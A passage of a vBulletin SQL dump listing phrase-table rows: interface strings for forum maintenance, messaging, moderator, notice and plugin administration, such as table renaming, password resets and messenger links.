(36486, -1, 'please_read_notes_after_completion', 'maintenance', 'Please read the notes at the bottom of this page when processing is complete.', 'vbulletin', '', 0, ''),
(36487, -1, 'post_id_to_start_at', 'maintenance', 'Post ID to start at', 'vbulletin', '', 0, ''),
(36488, -1, 'posts_queried', 'maintenance', 'Posts Queried', 'vbulletin', '', 0, ''),
(36489, -1, 'prefix_change_confirm', 'maintenance', 'If you are sure you want to continue and rename the tables listed\r\nabove, click the rename button below.
\r\nNote: This is your final chance to stop. Clicking the button below will alter\r\nall the tables listed above, requiring you to edit your config.php file\r\nbefore your vBulletin will work again.
\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36490, -1, 'processing_time_x', 'maintenance', 'Processing Time: {1}', 'vbulletin', '', 0, ''),
(36491, -1, 'querying_first_post_of_thread', 'maintenance', 'Querying first post of thread...', 'vbulletin', '', 0, ''),
(36492, -1, 'rebuild_album_updates', 'maintenance', 'Rebuild Album Updates', 'vbulletin', 'vBulletin Solutions', 1217327283, '3.8.0 Alpha 1'),
(36493, -1, 'rebuild_attachment_thumbnails', 'maintenance', 'Rebuild Attachment Thumbnails', 'vbulletin', '', 0, ''),
(36494, -1, 'rebuild_avatar_thumbnails', 'maintenance', 'Rebuild Avatar Thumbnails', 'vbulletin', 'vBulletin Solutions', 1193951620, '3.7.0 Beta 1'),
(36495, -1, 'rebuild_custom_avatar_thumbnails', 'maintenance', 'Rebuild Custom Avatar Thumbnails', 'vbulletin', 'vBulletin Solutions', 1194043852, '3.7.0 Beta 1'),
(36496, -1, 'rebuild_forum_information', 'maintenance', 'Rebuild Forum Information', 'vbulletin', '', 0, ''),
(36497, -1, 'rebuild_post_cache', 'maintenance', 'Rebuild Post Cache', 'vbulletin', '', 0, ''),
(36498, -1, 'rebuild_recently_updated_albums_description', 'maintenance', 'This will recalculate the albums to display in the Recently Updated Albums list, effectively removing any albums that are no longer accessible. This may be the case if any users recently made album updates but have since had their album permissions revoked.', 'vbulletin', 'vBulletin Solutions', 1217327232, '3.8.0 Alpha 1'),
(36499, -1, 'rebuild_recently_updated_albums_list', 'maintenance', 'Rebuild Recently Updated Albums', 'vbulletin', 'vBulletin Solutions', 1217327084, '3.8.0 Alpha 1'),
(36500, -1, 'rebuild_search_index', 'maintenance', 'Rebuild Search Index', 'vbulletin', '', 0, ''),
(36501, -1, 'rebuild_sgicon_thumbnails', 'maintenance', 'Rebuild Social Group Icon Thumbnails', 'vbulletin', 'vBulletin Solutions', 1231771209, '3.8.1'),
(36502, -1, 'rebuild_similar_threads', 'maintenance', 'Rebuild Similar Threads', 'vbulletin', '', 0, ''),
(36503, -1, 'rebuild_statistics', 'maintenance', 'Rebuild Statistics', 'vbulletin', '', 0, ''),
(36504, -1, 'rebuild_statistics_warning', 'maintenance', 'Rebuilding statistics will cause the loss of the total forum view and active users data. Only run this if you believe you really need to! Once the data has been replaced, there is no way to restore your database.', 'vbulletin', 'vBulletin Solutions', 1150106903, '3.6.0 Beta 2'),
(36505, -1, 'rebuild_styles', 'maintenance', 'Rebuild Styles', 'vbulletin', '', 0, ''),
(36506, -1, 'rebuild_thread_information', 'maintenance', 'Rebuild Thread Information', 'vbulletin', '', 0, ''),
(36507, -1, 'rebuild_user_reputation', 'maintenance', 'Rebuild User Reputation', 'vbulletin', '', 0, ''),
(36508, -1, 'recalculate_users_post_counts_warning', 'maintenance', 'This will recalculate all of your user\'s post counts based on their CURRENT posts in the database. Do not run this if you have pruned posts, manually changed post counts, or imported from another forum package and you wish to maintain your users\' current counts. Your members\' post counts will PROBABLY decrease so only run this if you believe you really need to! Once they decrease you cannot bring them back up without restoring your database or manually editing each user. You have been warned!', 'vbulletin', '', 0, ''),
(36509, -1, 'remove_orphan_posts', 'maintenance', 'Remove Orphan Posts', 'vbulletin', '', 0, ''),
(36510, -1, 'remove_orphan_threads', 'maintenance', 'Remove Orphan Threads', 'vbulletin', '', 0, ''),
(36511, -1, 'removing_duplicate_threads', 'maintenance', 'Removing duplicate threads...', 'vbulletin', '', 0, ''),
(36512, -1, 'removing_orphan_threads', 'maintenance', 'Removing Orphan Threads', 'vbulletin', '', 0, ''),
(36513, -1, 'rename_sql_tables', 'maintenance', 'Rename SQL Tables', 'vbulletin', '', 0, ''),
(36514, -1, 'rename_table_x', 'maintenance', 'Rename Table {1} ?\r\n', 'vbulletin', '', 0, ''),
(36515, -1, 'rename_tables', 'maintenance', 'Rename Tables\r\n', 'vbulletin', '', 0, ''),
(36516, -1, 'renaming_process_complete', 'maintenance', 'Renaming Process Complete\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36517, -1, 'renaming_table_with_new_prefix', 'maintenance', 'Renaming Tables With New Table Prefix', 'vbulletin', '', 0, ''),
(36518, -1, 'renaming_x_to_y', 'maintenance', 'Renaming {1} to {2} ... ', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36519, -1, 'renumber_all_templates_from_one', 'maintenance', 'Renumber all templates from 1 Note: this option requires that your MySQL account has ALTER, CREATE and DROP privileges. If you are not sure, do not use this option! ', 'vbulletin', '', 0, ''),
(36520, -1, 'reputation_base', 'maintenance', 'Base Reputation Value', 'vbulletin', '', 0, ''),
(36521, -1, 'reset_accounts_with_last_activity', 'maintenance', 'Reset Accounts with Last Activity', 'vbulletin', 'vBulletin Solutions', 1219244638, '3.8.0 Alpha 1'),
(36522, -1, 'reset_password_if_email_failed', 'maintenance', 'Reset Password if Email Failed\r\nThis option allows you to reset the password even if the email attempt failed. Only choose this option if the email attempts are failing consistently. ', 'vbulletin', 'vBulletin Solutions', 1220350745, '3.8.0 Alpha 1'),
(36523, -1, 'reset_passwords', 'maintenance', 'Reset Passwords', 'vbulletin', 'vBulletin Solutions', 1219243428, '3.8.0 Alpha 1'),
(36524, -1, 'reset_passwords_for_users_with_language', 'maintenance', 'Reset Passwords for Accounts Using LanguageOnly reset and notify users who have their accounts configured to use this language. ', 'vbulletin', 'vBulletin Solutions', 1222095712, '3.8.0 Alpha 2'),
(36525, -1, 'reset_vulnerable_passwords', 'maintenance', 'Reset Vulnerable Passwords', 'vbulletin', 'vBulletin Solutions', 1219323829, '3.8.0 Alpha 1'),
(36526, -1, 'send_info', 'maintenance', 'Send Information', 'vbulletin', 'vBulletin Solutions', 1158154140, '3.6.1'),
(36527, -1, 'set_all_no', 'maintenance', 'Set All No', 'vbulletin', '', 0, ''),
(36528, -1, 'set_all_yes', 'maintenance', 'Set All Yes\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36529, -1, 'some_errors_occured_while_resetting_passwords', 'maintenance', 'Some errors occurred while resetting passwords. The affected accounts did not have their password reset.', 'vbulletin', 'vBulletin Solutions', 1240226395, '3.8.3'),
(36530, -1, 'some_errors_occured_while_sending_emails', 'maintenance', 'Some errors occurred while sending emails to the users. The affected accounts did not have their password reset, unless you chose to reset the password even when emailing failed.', 'vbulletin', 'vBulletin Solutions', 1240226573, '3.8.3'),
(36531, -1, 'system_architecture', 'maintenance', 'System Architecture', 'vbulletin', 'vBulletin Solutions', 1158153997, '3.6.1'),
(36532, -1, 'table_name', 'maintenance', 'Table Name \r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36533, -1, 'table_x_does_not_exist', 'maintenance', 'Table \'{1} \' does not exist!\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36534, -1, 'tableprefix_change_completed', 'maintenance', 'This script has now completed. \r\nYour table prefix has been changed from \'{1} \' to \'{2} \'.
\r\nYou must now edit your includes/config.php file to include the line:
\r\n$config[\'Database\'][\'tableprefix\'] = \'{2}\'; \r\nYour vBulletin installation will not function until you do this.
\r\n', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36535, -1, 'this_script_will_allow_you_to_rename_your_vb_tables', 'maintenance', 'This script will allow you to rename your vBulletin SQL tables in order to accommodate a new table prefix value in includes/config.php .
\r\nNote: Do not alter the tableprefix value in config.php until this script has completed and you are given a message telling you to edit the value.
\r\nYour table prefix is currently set to \'{1}\' .
', 'vbulletin', '', 0, ''),
(36536, -1, 'threaded_mode_usage', 'maintenance', 'Threaded Mode Usage', 'vbulletin', 'vBulletin Solutions', 1158154084, '3.6.1'),
(36537, -1, 'thumbnail_quality', 'maintenance', 'Quality of JPG thumbnails (0 .. 100)', 'vbulletin', '', 0, ''),
(36538, -1, 'today', 'maintenance', 'Today', 'vbulletin', 'vBulletin Solutions', 1219232905, '3.8.0 Alpha 1'),
(36539, -1, 'total_forums', 'maintenance', 'Total Forums', 'vbulletin', 'vBulletin Solutions', 1158154095, '3.6.1'),
(36540, -1, 'total_number_posts_process', 'maintenance', 'Total number of posts to process: (0 for unlimited) ', 'vbulletin', '', 0, ''),
(36541, -1, 'total_posts', 'maintenance', 'Total Posts', 'vbulletin', 'vBulletin Solutions', 1158154062, '3.6.1'),
(36542, -1, 'total_posts_processed_x', 'maintenance', 'Total Posts Processed: {1}', 'vbulletin', '', 0, ''),
(36543, -1, 'total_usergroups', 'maintenance', 'Total Usergroups', 'vbulletin', 'vBulletin Solutions', 1158154107, '3.6.1'),
(36544, -1, 'total_users', 'maintenance', 'Total Users', 'vbulletin', 'vBulletin Solutions', 1158154074, '3.6.1'),
(36545, -1, 'unable_to_read_avatar', 'maintenance', 'Unable to read avatar', 'vbulletin', 'vBulletin Solutions', 1207321358, '3.7.0 Release Candidate 3'),
(36546, -1, 'update_post_counts', 'maintenance', 'Update Post Counts', 'vbulletin', '', 0, ''),
(36547, -1, 'update_user_titles', 'maintenance', 'Update User Titles and Ranks', 'vbulletin', '', 0, ''),
(36548, -1, 'update_usernames', 'maintenance', 'Update User Names', 'vbulletin', '', 0, ''),
(36549, -1, 'updating_forums', 'maintenance', 'Updating Forums', 'vbulletin', '', 0, ''),
(36550, -1, 'updating_similar_threads', 'maintenance', 'Updating Similar Threads', 'vbulletin', '', 0, ''),
(36551, -1, 'updating_threads', 'maintenance', 'Updating Threads', 'vbulletin', '', 0, ''),
(36552, -1, 'updating_user_info', 'maintenance', 'Updating user info...', 'vbulletin', '', 0, ''),
(36553, -1, 'updating_usernames', 'maintenance', 'Updating User Names', 'vbulletin', '', 0, ''),
(36554, -1, 'vbulletin_table_prefix_rename_system', 'maintenance', 'vBulletin 3 Table Prefix Rename System', 'vbulletin', '', 0, ''),
(36555, -1, 'vbulletin_version', 'maintenance', 'vBulletin Version', 'vbulletin', 'vBulletin Solutions', 1158153978, '3.6.1'),
(36556, -1, 'vulnerable_password_reset_email', 'maintenance', 'Dear {username},\r\n\r\nA vulnerability has been found with your password at {1}. Some passwords are vulnerable to exploitation which may allow a third party to hijack your account.\r\n\r\nThis may lead to your account being used without your knowledge or permission, and actions being performed under your name.\r\n\r\nVulnerable accounts can also be bad for the board as a whole as they may enable access for automated tools to spam both the forums and other user accounts, \r\nusing your username.\r\n\r\nAs such we have had to reset your password.\r\nYou can find your new login details below.\r\n\r\nUsername: {username}\r\nPassword: {password}\r\n\r\nIf you want to change your password, login with the above details at the following location:\r\n{2}/profile.php?do=editpassword\r\n\r\n\r\nWe apologize for any inconvenience this may cause and appreciate your understanding.\r\n\r\n\r\n\r\nAll the best,\r\n{1}', 'vbulletin', 'vBulletin Solutions', 1219317885, '3.8.0 Alpha 1'),
(36557, -1, 'vulnerable_password_reset_email_subject', 'maintenance', '{1} - Account Password Vulnerability', 'vbulletin', 'vBulletin Solutions', 1219249512, '3.8.0 Alpha 1'),
(36558, -1, 'x_accounts_processed', 'maintenance', '{1} accounts processed', 'vbulletin', 'vBulletin Solutions', 1219329223, '3.8.0 Alpha 1'),
(36559, -1, 'x_of_y_passwords_were_reset', 'maintenance', '{1} of {2} password(s) were reset ', 'vbulletin', 'vBulletin Solutions', 1219833526, '3.8.0 Alpha 1'),
(36560, -1, 'you_have_chosen_to_rename_the_following_tables', 'maintenance', 'You have chosen to rename the following tables', 'vbulletin', '', 0, ''),
(36561, -1, 'add_x_to_your_contact_list', 'messaging', 'Add {1} to your contact list', 'vbulletin', '', 0, ''),
(36562, -1, 'aim', 'messaging', 'AIM', 'vbulletin', '', 0, ''),
(36563, -1, 'aim_hi_are_you_there', 'messaging', 'Hi.+Are+you+there?', 'vbulletin', '', 0, ''),
(36564, -1, 'email_subject', 'messaging', 'Email Subject', 'vbulletin', '', 0, ''),
(36565, -1, 'email_to_friend', 'messaging', 'Email to Friend', 'vbulletin', '', 0, ''),
(36566, -1, 'from', 'messaging', 'From', 'vbulletin', '', 0, ''),
(36567, -1, 'icq', 'messaging', 'ICQ', 'vbulletin', '', 0, ''),
(36568, -1, 'message_dialog', 'messaging', 'Message Dialog', 'vbulletin', 'vBulletin Solutions', 1194867683, '3.7.0 Beta 1'),
(36569, -1, 'msn', 'messaging', 'MSN', 'vbulletin', '', 0, ''),
(36570, -1, 'msn_functions_only_work_in_ie', 'messaging', 'The MSN Messenger / Windows Messenger / Live Messenger functions only work when launched from Internet Explorer on a system with the Messenger application configured and running.', 'vbulletin', 'vBulletin Solutions', 1212579909, '3.8.0 Alpha 1'),
(36571, -1, 'online_status', 'messaging', 'Online Status', 'vbulletin', '', 0, ''),
(36572, -1, 'other', 'messaging', 'Other', 'vbulletin', '', 0, ''),
(36573, -1, 'private_message', 'messaging', 'Private Message', 'vbulletin', 'vBulletin Solutions', 1220978710, '3.8.0 Alpha 1'),
(36574, -1, 'recipient_email_address', 'messaging', 'Recipient Email Address', 'vbulletin', '', 0, ''),
(36575, -1, 'recipient_name', 'messaging', 'Recipient Name', 'vbulletin', '', 0, ''),
(36576, -1, 'report_bad_post', 'messaging', 'Report Post', 'vbulletin', 'vBulletin Solutions', 1153239749, '3.6.0 Release Candidate 3'),
(36577, -1, 'report_bad_private_message', 'messaging', 'Report Private Message', 'vbulletin', 'vBulletin Solutions', 1220978673, '3.8.0 Alpha 1'),
(36578, -1, 'send_email_to_forum_administrator', 'messaging', 'Send an Email to the Forum Administrator', 'vbulletin', '', 0, ''),
(36579, -1, 'send_message', 'messaging', 'Send Message', 'vbulletin', '', 0, ''),
(36580, -1, 'send_message_via_aim_to_x_link', 'messaging', 'Send Message Via AIM to {2} ', 'vbulletin', '', 0, ''),
(36581, -1, 'send_message_via_email_to_x_link', 'messaging', 'Send a message via Email to {2} ', 'vbulletin', '', 0, ''),
(36582, -1, 'send_message_via_icq_to_x_link', 'messaging', 'Send Message Via ICQ to {2} ', 'vbulletin', '', 0, ''),
(36583, -1, 'send_message_via_msn_to_x_link', 'messaging', 'Send Message Via MSN to {2} ', 'vbulletin', '', 0, ''),
(36584, -1, 'send_message_via_skype_to_x_link', 'messaging', 'Send Message Via Skype™ to {2} ', 'vbulletin', '', 0, ''),
(36585, -1, 'send_message_via_x_to_y', 'messaging', 'Send message via {1} to {2}', 'vbulletin', '', 0, ''),
(36586, -1, 'send_message_via_yahoo_to_x_link', 'messaging', 'Send Message Via Yahoo! to {2} ', 'vbulletin', '', 0, ''),
(36587, -1, 'send_page_to_a_friend', 'messaging', 'Send Page to a Friend', 'vbulletin', '', 0, ''),
(36588, -1, 'send_x_a_message', 'messaging', 'Send {1} a message', 'vbulletin', '', 0, ''),
(36589, -1, 'skype', 'messaging', 'Skype™', 'vbulletin', '', 0, ''),
(36590, -1, 'skype_add_contact', 'messaging', 'Add to Skype contact list', 'vbulletin', '', 0, ''),
(36591, -1, 'skype_leave_voicemail', 'messaging', 'Leave voicemail using Skype', 'vbulletin', '', 0, ''),
(36592, -1, 'skype_send_file', 'messaging', 'Send a file using Skype', 'vbulletin', '', 0, ''),
(36593, -1, 'skype_start_call', 'messaging', 'Start Skype voice call', 'vbulletin', '', 0, ''),
(36594, -1, 'skype_start_chat', 'messaging', 'Start Skype text chat', 'vbulletin', '', 0, ''),
(36595, -1, 'skype_view_profile', 'messaging', 'View Skype profile', 'vbulletin', '', 0, ''),
(36596, -1, 'these_functions_require_aim', 'messaging', 'Please note that these functions require that you actually have the AOL Instant Messenger application installed on your computer.', 'vbulletin', '', 0, ''),
(36597, -1, 'these_functions_require_msn', 'messaging', 'Please note that these functions require that you be logged into either MSN Messenger or Windows Messenger. You will not be able to send messages to the email address that you are logged into MSN/Windows Messenger with.', 'vbulletin', 'vBulletin Solutions', 1169462061, '3.6.5'),
(36598, -1, 'these_functions_require_skype', 'messaging', 'These functions require Skype™ to be installed.', 'vbulletin', '', 0, ''),
(36599, -1, 'thought_might_be_interested', 'messaging', 'I thought you might be interested in reading this web page:\r\n{1}/showthread.php?t={2}&referrerid={3}\r\n\r\nFrom,\r\n{4}', 'vbulletin', 'vBulletin Solutions', 1161596584, '3.6.3'),
(36600, -1, 'using_form_email_available_to_user', 'messaging', 'Note: By using this form, your email address will become available to the user who you are emailing.', 'vbulletin', '', 0, ''),
(36601, -1, 'view_the_profile_of_x', 'messaging', 'View the profile of {1} ', 'vbulletin', '', 0, ''),
(36602, -1, 'yahoo', 'messaging', 'Yahoo!', 'vbulletin', '', 0, ''),
(36603, -1, 'you_must_be_logged_into_msn_before_doing_this', 'messaging', 'You must be logged into MSN or Windows Messenger before doing this.', 'vbulletin', '', 0, ''),
(36604, -1, 'your_details', 'messaging', 'Your Details', 'vbulletin', '', 0, ''),
(36605, -1, 'your_name', 'messaging', 'Your Name', 'vbulletin', '', 0, ''),
(36606, -1, 'add_new_moderator_to_forum_x', 'moderator', 'Add New Moderator to Forum {1} ', 'vbulletin', '', 0, ''),
(36607, -1, 'are_you_sure_want_to_delete_moderator_x', 'moderator', 'Are you sure you want to delete the moderator called \'{1}\'?({2}: {3}) {4} This action cannot be undone and may cause this user to be returned to the default, registered group.', 'vbulletin', 'vBulletin Solutions', 1194350596, '3.7.0 Beta 1'),
(36608, -1, 'are_you_sure_you_want_to_delete_this_moderator', 'moderator', 'Are you sure you want to delete this Moderator? This action may cause this user to be returned to the default, registered group.', 'vbulletin', 'vBulletin Solutions', 1194350551, '3.7.0 Beta 1'),
(36609, -1, 'can_delete_albums_pictures', 'moderator', 'Can Delete Albums/Pictures', 'vbulletin', 'vBulletin Solutions', 1192541547, '3.7.0 Beta 1'),
(36610, -1, 'can_edit_albums_pictures', 'moderator', 'Can Edit Albums/Pictures', 'vbulletin', 'vBulletin Solutions', 1192541527, '3.7.0 Beta 1'),
(36611, -1, 'can_edit_user_reputation_comments', 'moderator', 'Can Edit User Reputation Comments', 'vbulletin', '', 0, ''),
(36612, -1, 'change_moderator_primary_usergroup_to', 'moderator', 'Change Moderator\'s Primary Usergroup to', 'vbulletin', '', 0, ''),
(36613, -1, 'edit_moderator_x_for_forum_y', 'moderator', 'Edit Moderator {1} for Forum {2}', 'vbulletin', '', 0, ''),
(36614, -1, 'email_preferences', 'moderator', 'Email Preferences', 'vbulletin', '', 0, ''),
(36615, -1, 'error_occurred_while_making_users_moderators', 'moderator', 'An error occurred while making the following users moderators:', 'vbulletin', 'vBulletin Solutions', 1200491592, '3.7.0 Beta 4'),
(36616, -1, 'if_you_would_like_to_remove_this_moderator', 'moderator', 'If You Would Like to Remove this Moderator', 'vbulletin', '', 0, ''),
(36617, -1, 'make_moderator_a_member_of', 'moderator', 'Make Moderator a Member of', 'vbulletin', '', 0, ''),
(36618, -1, 'moderator_manager', 'moderator', 'Moderator Manager', 'vbulletin', '', 0, ''),
(36619, -1, 'more_than_x_days_ago', 'moderator', 'More Than {1} Days Ago', 'vbulletin', '', 0, ''),
(36620, -1, 'receive_email_on_new_post', 'moderator', 'Receive Email When a New Post is Created', 'vbulletin', '', 0, ''),
(36621, -1, 'receive_email_on_new_thread', 'moderator', 'Receive Email When a New Thread is Created', 'vbulletin', '', 0, ''),
(36622, -1, 'remove_moderator_from_all_forums', 'moderator', 'Remove this Moderator from All Forums', 'vbulletin', '', 0, ''),
(36623, -1, 'super_moderator_permissions', 'moderator', 'Super Moderator Permissions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36624, -1, 'super_moderators', 'moderator', 'Super Moderators', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36625, -1, 'the_following_users_were_made_moderators', 'moderator', 'The following users were successfully made moderators:', 'vbulletin', 'vBulletin Solutions', 1200490926, '3.7.0 Beta 4'),
(36626, -1, 'there_are_no_moderators', 'moderator', 'There are no assigned moderators.', 'vbulletin', 'vBulletin Solutions', 1170199983, '3.6.5'),
(36627, -1, 'user_album_permissions', 'moderator', 'User Album Permissions', 'vbulletin', 'vBulletin Solutions', 1192541510, '3.7.0 Beta 1'),
(36628, -1, 'are_you_sure_want_to_delete_notice_x', 'notice', 'Are you sure you want to permanently delete the notice {1} ?({2}={3}) \r\n \r\nThis operation cannot be un-done.', 'vbulletin', 'vBulletin Solutions', 1189781846, '3.6.8'),
(36629, -1, 'browsing_forum_x_and_children_criteria', 'notice', 'User is browsing forum {1} or one of its child forums', 'vbulletin', 'vBulletin Solutions', 1189612492, '3.6.8'),
(36630, -1, 'browsing_forum_x_criteria', 'notice', 'User is browsing forum {1}', 'vbulletin', 'vBulletin Solutions', 1189612474, '3.6.8'),
(36631, -1, 'criterion_is_active', 'notice', 'Criterion is Active', 'vbulletin', 'vBulletin Solutions', 1189776085, '3.6.8'),
(36632, -1, 'dismissible', 'notice', 'Dismissible', 'vbulletin', 'vBulletin Solutions', 1219006214, '3.8.0 Alpha 1'),
(36633, -1, 'display_notice_if_elipsis', 'notice', 'Display this notice if...', 'vbulletin', 'vBulletin Solutions', 1189775515, '3.6.8'),
(36634, -1, 'edit_notice', 'notice', 'Edit Notice', 'vbulletin', 'vBulletin Solutions', 1189775392, '3.6.8'),
(36635, -1, 'has_never_posted_criteria', 'notice', 'User has never posted', 'vbulletin', 'vBulletin Solutions', 1189767510, '3.6.8'),
(36636, -1, 'has_x_infraction_points_criteria', 'notice', 'User has between {1} and {2} infraction points', 'vbulletin', 'vBulletin Solutions', 1189687099, '3.6.8'),
(36637, -1, 'has_x_postcount_criteria', 'notice', 'User\'s post-count is between {1} and {2} posts', 'vbulletin', 'vBulletin Solutions', 1189767137, '3.6.8'),
(36638, -1, 'has_x_reputation_criteria', 'notice', 'User has between {1} and {2} reputation points', 'vbulletin', 'vBulletin Solutions', 1189687718, '3.6.8'),
(36639, -1, 'in_coventry_criteria', 'notice', 'User is in Coventry (global ignore)', 'vbulletin', 'vBulletin Solutions', 1189613306, '3.6.8'),
(36640, -1, 'in_usergroup_x_criteria', 'notice', 'User belongs to usergroup {1}', 'vbulletin', 'vBulletin Solutions', 1189612323, '3.6.8'),
(36641, -1, 'is_birthday_criteria', 'notice', 'User\'s birthday is today', 'vbulletin', 'vBulletin Solutions', 1189612512, '3.6.8'),
(36642, -1, 'is_date_criteria', 'notice', 'The date is {1} {2} (Use dd-mm-yyyy format)', 'vbulletin', 'vBulletin Solutions', 1212762443, '3.8.0 Alpha 1'),
(36643, -1, 'is_time_criteria', 'notice', 'The time is between {1} and {2} {3} (Use hh:mm 24 hour format)', 'vbulletin', 'vBulletin Solutions', 1212762416, '3.8.0 Alpha 1'),
(36644, -1, 'no_posts_in_x_days_criteria', 'notice', 'User has not posted for {1} days or more (but has posted previously)', 'vbulletin', 'vBulletin Solutions', 1189767321, '3.6.8'),
(36645, -1, 'no_visit_in_x_days_criteria', 'notice', 'User has not visited for {1} days or more', 'vbulletin', 'vBulletin Solutions', 1189687293, '3.6.8'),
(36646, -1, 'not_in_usergroup_x_criteria', 'notice', 'User does not belong to usergroup {1}', 'vbulletin', 'vBulletin Solutions', 1189612342, '3.6.8'),
(36647, -1, 'notice_html', 'notice', 'Notice HTML', 'vbulletin', 'vBulletin Solutions', 1189698555, '3.6.8'),
(36648, -1, 'notice_html_description', 'notice', 'This is the HTML that will be shown to visitors when the conditions set below are met. \r\n \r\nYou may include the following special variables in the HTML: \r\n{userid}, {username}, {musername}, {sessionurl}
', 'vbulletin', 'vBulletin Solutions', 1189776671, '3.6.8'),
(36649, -1, 'notice_title_description', 'notice', 'This text is used solely in the Admin CP', 'vbulletin', 'vBulletin Solutions', 1189776415, '3.6.8'),
(36650, -1, 'notice_x_not_displayed_criteria', 'notice', 'Criteria for notice {1} are not met', 'vbulletin', 'vBulletin Solutions', 1206707239, '3.7.0 Release Candidate 2'),
(36651, -1, 'persistent', 'notice', 'Persistent', 'vbulletin', 'vBulletin Solutions', 1189774634, '3.6.8'),
(36652, -1, 'persistent_description', 'notice', 'If this option is set to \'No\', the notice will be shown only once per visit to each user.', 'vbulletin', 'vBulletin Solutions', 1189776982, '3.6.8'),
(36653, -1, 'pm_storage_x_percent_full_criteria', 'notice', 'User\'s private message storage is between {1}% and {2}% full', 'vbulletin', 'vBulletin Solutions', 1189687241, '3.6.8'),
(36654, -1, 'style_is_x_criteria', 'notice', 'User is browsing using style {1}', 'vbulletin', 'vBulletin Solutions', 1189779007, '3.6.8'),
(36655, -1, 'user_timezone', 'notice', 'User\'s Timezone', 'vbulletin', 'vBulletin Solutions', 1212762396, '3.8.0 Alpha 1'),
(36656, -1, 'username_is_criteria', 'notice', 'User\'s username is {1}', 'vbulletin', 'vBulletin Solutions', 1189612541, '3.6.8'),
(36657, -1, 'utc_universal_time', 'notice', 'UTC / Universal Time', 'vbulletin', 'vBulletin Solutions', 1212762382, '3.8.0 Alpha 1'),
(36658, -1, 'add_import_product', 'plugins', 'Add/Import Product', 'vbulletin', '', 0, ''),
(36659, -1, 'add_new_install_uninstall_code', 'plugins', 'Add New Install/Uninstall Code', 'vbulletin', '', 0, ''),
(36660, -1, 'add_new_plugin', 'plugins', 'Add New Plugin', 'vbulletin', '', 0, ''),
(36661, -1, 'add_new_product', 'plugins', 'Add New Product', 'vbulletin', '', 0, ''),
(36662, -1, 'add_new_product_dependency', 'plugins', 'Add New Product Dependency', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36663, -1, 'allow_overwrite_upgrade_product', 'plugins', 'Allow OverwriteIf you wish to upgrade a product, you must set this to yes. ', 'vbulletin', '', 0, ''),
(36664, -1, 'are_you_sure_want_to_delete_plugin_x', 'plugins', 'Are you sure you want to delete the plugin called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(36665, -1, 'are_you_sure_want_to_delete_product_x', 'plugins', 'Are you sure you want to uninstall the product called \'{1}\'?({2}: {3}) {4} This action cannot be undone.', 'vbulletin', 'vBulletin Solutions', 1173955882, '3.6.6'),
(36666, -1, 'check_version', 'plugins', 'Check Version', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36667, -1, 'click_here_for_more_info', 'plugins', 'Click here for more information!', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36668, -1, 'compatibility_starts', 'plugins', 'Compatibility Starts', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36669, -1, 'compatibility_starts_with_version', 'plugins', 'Compatibility Starts With Version', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36670, -1, 'compatible_starting_with_x', 'plugins', 'Compatible starting with {1}', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36671, -1, 'dependency_type', 'plugins', 'Dependency Type', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36672, -1, 'edit_plugin_x', 'plugins', 'Edit Plugin {1} ', 'vbulletin', '', 0, ''),
(36673, -1, 'edit_product_x', 'plugins', 'Edit Product {1} ', 'vbulletin', '', 0, ''),
(36674, -1, 'existing_install_uninstall_code', 'plugins', 'Existing Install/Uninstall Code', 'vbulletin', '', 0, ''),
(36675, -1, 'existing_product_dependencies', 'plugins', 'Existing Product Dependencies', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36676, -1, 'hook_location', 'plugins', 'Hook Location', 'vbulletin', 'vBulletin Solutions', 1225804973, '3.8.0 Beta 2'),
(36677, -1, 'hook_location_desc', 'plugins', 'This specifies the location within the vBulletin code of the hook that will fire this plugin function.', 'vbulletin', '', 0, ''),
(36678, -1, 'import_plugin_xml_file', 'plugins', 'Import Plugin Definitions XML File', 'vbulletin', '', 0, ''),
(36679, -1, 'import_product', 'plugins', 'Import Product', 'vbulletin', '', 0, ''),
(36680, -1, 'importing_plugins', 'plugins', 'Importing Plugin Definitions', 'vbulletin', '', 0, ''),
(36681, -1, 'importing_product', 'plugins', 'Importing Product', 'vbulletin', '', 0, ''),
(36682, -1, 'incompatible_with', 'plugins', 'Incompatible With', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36683, -1, 'incompatible_with_version_and_newer', 'plugins', 'Incompatible With Version\r\n(And newer versions) ', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36684, -1, 'incompatible_with_x_and_greater', 'plugins', 'Incompatible with {1} and greater', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36685, -1, 'install_code', 'plugins', 'Install Code', 'vbulletin', '', 0, ''),
(36686, -1, 'installed_products', 'plugins', 'Installed Products', 'vbulletin', '', 0, ''),
(36687, -1, 'installed_version', 'plugins', 'Installed Version', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36688, -1, 'latest_version', 'plugins', 'Latest Version', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(36689, -1, 'mysql_version', 'plugins', 'MySQL Version', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
